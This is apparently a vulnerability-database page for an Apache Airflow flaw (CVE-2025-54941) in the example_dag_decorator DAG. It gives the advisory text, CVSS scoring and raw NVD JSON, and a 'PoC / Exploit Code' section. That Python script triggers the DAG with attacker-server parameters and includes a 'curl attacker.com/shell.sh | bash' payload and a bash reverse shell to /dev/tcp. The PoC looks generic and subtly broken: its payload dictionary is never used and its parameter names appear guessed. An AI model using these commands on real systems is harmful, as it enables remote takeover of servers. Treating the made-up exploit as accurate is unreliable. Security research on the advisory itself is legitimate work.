Security Vulnerability Report
CVE-2025-54941 CVSS 4.6 MEDIUM

CVE-2025-54941

Published: 2025-10-30 10:15:36
Last Modified: 2025-11-04 22:16:30

Description

The example DAG `example_dag_decorator` had a non-validated parameter that allowed a UI user to redirect the example to a malicious server and execute code on a worker. This, however, required that example DAGs be enabled in production (not the default) or that the example DAG code was copied to build a similar DAG of your own. If you used `example_dag_decorator`, review it and apply the changes implemented in Airflow 3.0.5 accordingly.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - VULNERABLE
Apache Airflow >= 3.0.0, < 3.0.5 (fixed in 3.0.5)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54941 PoC - Apache Airflow example_dag_decorator Exploitation
# Target: Apache Airflow < 3.0.5 (fixed in 3.0.5)
import json

import requests

TARGET_URL = "http://target-airflow-server:8080"
MALICIOUS_SERVER = "http://attacker-controlled-server:8888"
DAG_ID = "example_dag_decorator"
USERNAME = "attacker_user"
PASSWORD = "user_password"


def get_auth_token():
    """Obtain Airflow authentication token"""
    response = requests.post(
        f"{TARGET_URL}/auth/login",
        data={"username": USERNAME, "password": PASSWORD},
    )
    return response.cookies.get("session")


def exploit():
    """
    Exploit the unvalidated parameter in example_dag_decorator
    to redirect execution to malicious server
    """
    session = get_auth_token()

    # Malicious payload that will be served by attacker server
    malicious_payload = {
        "command": "curl http://attacker.com/shell.sh | bash",
        "target_server": MALICIOUS_SERVER,
    }

    # Trigger DAG with malicious parameters
    trigger_data = {
        "conf": json.dumps(
            {
                "target_url": MALICIOUS_SERVER,
                "callback_endpoint": f"{MALICIOUS_SERVER}/callback",
            }
        )
    }

    response = requests.post(
        f"{TARGET_URL}/api/v1/dags/{DAG_ID}/dagRuns",
        cookies={"session": session},
        json=trigger_data,
    )
    print(f"DAG triggered: {response.status_code}")
    return response.json()


# Attacker-controlled server should serve malicious commands
MALICIOUS_SERVER_CODE = '''
#!/bin/bash
# This script will be executed on the Airflow worker
# Reverse shell or arbitrary command execution
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
'''

References

https://lists.apache.org/thread/c6q6nofc6xl5bms039ks9b34v0v36df1 (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/10/29/6

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54941", "sourceIdentifier": "[email protected]", "published": "2025-10-30T10:15:35.530", "lastModified": "2025-11-04T22:16:29.720", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An example dag `example_dag_decorator` had non-validated parameter that allowed the UI user to redirect the example to a malicious server and execute code on worker. This however required that the example dags are enabled in production (not default) or the example dag code copied to build your own similar dag. If you used the `example_dag_decorator` please review it and apply the changes implemented in Airflow 3.0.5 accordingly."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.5", "matchCriteriaId": "E2461B24-C975-4644-B9FF-27F61C54C1DE"}]}]}], "references": [{"url": "https://lists.apache.org/thread/c6q6nofc6xl5bms039ks9b34v0v36df1", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/29/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}